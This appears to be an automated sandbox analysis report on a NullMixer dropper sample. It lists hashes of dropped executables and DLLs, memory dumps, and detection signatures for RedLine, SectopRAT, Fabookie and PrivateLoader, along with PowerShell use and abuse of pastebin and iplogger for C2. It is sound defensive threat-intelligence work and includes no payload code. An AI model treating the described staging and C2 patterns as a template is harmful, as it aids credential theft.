SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3852-85-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe

MD5 69c4678681165376014646030a4fe7e4
SHA1 fb110dad415ac036c828b51c38debd34045aa0f3
SHA256 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77
SHA512 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/2052-124-0x0000000002960000-0x0000000002966000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

memory/2052-103-0x0000000000850000-0x0000000000866000-memory.dmp

memory/3852-102-0x0000000073640000-0x0000000073DF0000-memory.dmp

memory/852-112-0x0000000005630000-0x0000000005984000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe

MD5 e90750ecf7d4add59391926ccfc15f51
SHA1 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1
SHA256 b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59
SHA512 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bq5afpt1.jus.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4920-99-0x0000000000330000-0x0000000000338000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

memory/3852-90-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/3852-89-0x0000000005E00000-0x0000000005E66000-memory.dmp

memory/1776-127-0x0000000000070000-0x00000000000E0000-memory.dmp

memory/3852-88-0x0000000005D60000-0x0000000005D82000-memory.dmp

memory/852-87-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/3852-68-0x0000000073640000-0x0000000073DF0000-memory.dmp

memory/4516-126-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2172-134-0x0000000004E30000-0x0000000004E4E000-memory.dmp

memory/4216-131-0x0000000000EC0000-0x0000000000F32000-memory.dmp

memory/3852-137-0x0000000006510000-0x000000000655C000-memory.dmp

memory/3852-136-0x00000000060B0000-0x00000000060CE000-memory.dmp

memory/2172-129-0x0000000004E60000-0x0000000004ED6000-memory.dmp

memory/2172-128-0x0000000000600000-0x0000000000670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-0SQKG.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2172-154-0x0000000005570000-0x0000000005B14000-memory.dmp

memory/3028-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1948-63-0x000000006494A000-0x000000006494F000-memory.dmp

memory/1948-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1948-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-50-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2744-155-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4516-160-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-HKIP4.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2232-159-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/1948-174-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/1948-179-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-178-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1948-177-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-170-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1948-176-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2764-185-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4868-196-0x0000000005400000-0x000000000543C000-memory.dmp

memory/4868-195-0x00000000054D0000-0x00000000055DA000-memory.dmp

memory/4868-194-0x00000000053A0000-0x00000000053B2000-memory.dmp

memory/3852-197-0x0000000006AA0000-0x0000000006AD2000-memory.dmp

memory/3852-208-0x0000000006A80000-0x0000000006A9E000-memory.dmp

memory/3852-198-0x000000006EA30000-0x000000006EA7C000-memory.dmp

memory/4868-188-0x0000000005840000-0x0000000005E58000-memory.dmp

memory/1608-193-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed0968d19e5ec37794.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4868-184-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3852-209-0x00000000076B0000-0x0000000007753000-memory.dmp

memory/852-210-0x000000006EA30000-0x000000006EA7C000-memory.dmp

memory/3852-213-0x0000000007800000-0x000000000781A000-memory.dmp

memory/3852-212-0x0000000007E40000-0x00000000084BA000-memory.dmp

memory/3852-227-0x0000000007880000-0x000000000788A000-memory.dmp

memory/3852-228-0x0000000007A70000-0x0000000007B06000-memory.dmp

memory/3852-229-0x0000000007A00000-0x0000000007A11000-memory.dmp

memory/3852-230-0x0000000007A30000-0x0000000007A3E000-memory.dmp

memory/3852-243-0x0000000007A40000-0x0000000007A54000-memory.dmp

memory/3852-244-0x0000000007B40000-0x0000000007B5A000-memory.dmp

memory/3852-245-0x0000000007B20000-0x0000000007B28000-memory.dmp

memory/3852-248-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9766eada4001f2c97df052619c080b1d
SHA1 06c7382a24ce7789b963e9fc45cd36167453ea74
SHA256 e701766f82fdfa3bb8c329dfa0ebdd8c00978796748a7292cdfe87d831101e23
SHA512 7146d321851989bd5925202e0efaf7ceee5b151420c33624bee854870d5ae6f9983f977446af60a2eeac0cc107e60f4e5e229256f98b3808bb95a1fc70bcf5a7

memory/852-253-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I

MD5 b1c69eec40db9d006f8b4df8ac3c038e
SHA1 4fc32d07029329e1e6c374b6af8d1925b1f64546
SHA256 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5
SHA512 e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d

C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L

MD5 e99d5f78660e8ea9d09045c7f1cba42c
SHA1 43ab1072c97572f4e8caefdcbe2d5aa211fd3087
SHA256 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98
SHA512 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~

MD5 6acc22b9c1abe535c6feac6a79db1a18
SHA1 eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9
SHA256 e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef
SHA512 f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf

C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt

MD5 36fb32e67fa42636817aca7805b49800
SHA1 ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164
SHA256 b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56
SHA512 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x

MD5 6ba17599a0544b52b5ea5ae9d261658f
SHA1 73637edb407d1a8cb80836b19602611cc71dcdf7
SHA256 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168
SHA512 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2

C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o

MD5 a6b49368224db5ac48fea0e7215b39d9
SHA1 7385c9cae70f58842c8337ddb038641515e71313
SHA256 fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262
SHA512 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Temp\_enU.W

MD5 13d4be61d9d3c7da927d482b449ff09e
SHA1 57fab8c699c46ff55b74794027201210c001dd0b
SHA256 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324
SHA512 ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378

memory/4076-264-0x0000000003340000-0x00000000033E6000-memory.dmp

memory/4076-265-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-267-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-268-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/3028-269-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1056-270-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4076-271-0x0000000000400000-0x000000000055D000-memory.dmp

memory/4076-280-0x00000000033F0000-0x0000000003483000-memory.dmp

memory/4076-281-0x0000000003490000-0x000000000423C000-memory.dmp

memory/4076-283-0x0000000004240000-0x00000000042CC000-memory.dmp

memory/4076-287-0x00000000042D0000-0x0000000004358000-memory.dmp

memory/4076-284-0x00000000042D0000-0x0000000004358000-memory.dmp

memory/4076-288-0x0000000000CB0000-0x0000000000CB1000-memory.dmp

memory/4076-289-0x0000000000CC0000-0x0000000000CC4000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
